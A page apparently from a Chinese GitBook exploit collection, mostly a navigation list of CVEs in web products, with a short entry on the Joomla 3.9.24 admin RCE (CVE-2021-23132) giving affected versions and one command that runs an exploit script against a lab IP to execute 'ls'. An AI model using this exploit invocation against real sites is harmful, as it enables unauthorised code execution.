Introduction
[+] 协同办公OA系统
[+] 编辑器上传漏洞
[+] 网络&安全设备
Apache Active MQ
- ActiveMQ 反序列化漏洞（CVE-2015-5254）
- ActiveMQ任意文件写入漏洞（CVE-2016-3088）
Apache Flink
Apache Kylin
- 命令注入漏洞（CVE-2020-13925）
Apache Shiro
Apache Solr
- Solr Velocity 注入远程命令执行漏洞 (CVE-2019-17558)
- Solr 未授权上传漏洞（CVE-2020-13957）
- Solr 远程命令执行漏洞（CVE-2019-0193）
Apache Spark
- Apache Spark 未授权访问漏洞
- RCE（CVE-2020-9480）
Apache Struts 2
Apache Tomcat
- AJP 文件包含漏洞（CVE-2020-1938）
Apereo CAS
- Apereo CAS 4.1 反序列化命令执行漏洞
Cacti
- Cacti v1.2.8 RCE（CVE-2020-8813）
Discuz
Drupal
- Drupal geddon-2 RCE（CVE-2018-7600）
- Drupal 需要密码内核RCE（CVE-2018-7602）
- SA CORE 2019 003 RCE CVE 2019 6340
E Cshop
- ECShop 2.7.3 RCE
Exchange
F 5 BIG IP
- BIG-IP-IQ 远程代码执行（CVE-2021-22986 ）
- TMUI 远程代码执行漏洞（CVE-2020-5902）
Fast Admin
- FastAdmin 用户权限RCE
Fastjson
Gitlab
Harbor
J Boss
- JBoss 5.x-6.x 反序列化漏洞（CVE-2017-12149）
Jellyfin
- 任意文件读取漏洞（CVE-2021-21402）
Jenkins
- Jenkins 远程命令执行漏洞（CVE-2018-1000861）
- Jenkins-CI 远程代码执行漏洞（CVE-2017-1000353）
Jira
Joomla
- Joomla 3.7.0 SQL注入(CVE-2017-8917)
- Joomla 3.9.17 后台RCE（CVE-2020-11890）
- Joomla 3.9.24 普通管理员RCE（CVE-2021-23132 ）
Kibana
- CVE 2019 7609
Nacos
- Nacos未授权访问（CVE-2020-19676）
Nexus
- Nexus Repository Manager 3 访问控制缺失及远程代码执行漏洞（CVE-2019-7238）
- Nexus Repository Manager 3 远程命令执行漏洞（CVE-2020-10204）
Php My Admin
SAP
- SAP NetWeaver AS JAVA 任意用户添加
Spring
Think CMF
Think PHP
Vmware
Weblogic
Word Press
XX Ljob
- xxl-job API接口未授权访问RCE
Zabbix
骑士CMS
- 骑士CMS远程代码执行
本书使用 GitBook 发布

Joomla 3.9.24 普通管理员RCE（CVE-2021-23132 ）

影响范围

3.0.0 <= Joomla! <= 3.9.24

EXP

python CVE-2021-23132.py -url http://192.168.72.140 -u admin -p 1234  -rce 1 -cmd ls

POChouse all right reserved，powered by GitbookFile Modify: 2021-06-28 20:31:33

results matching ""

No results matching ""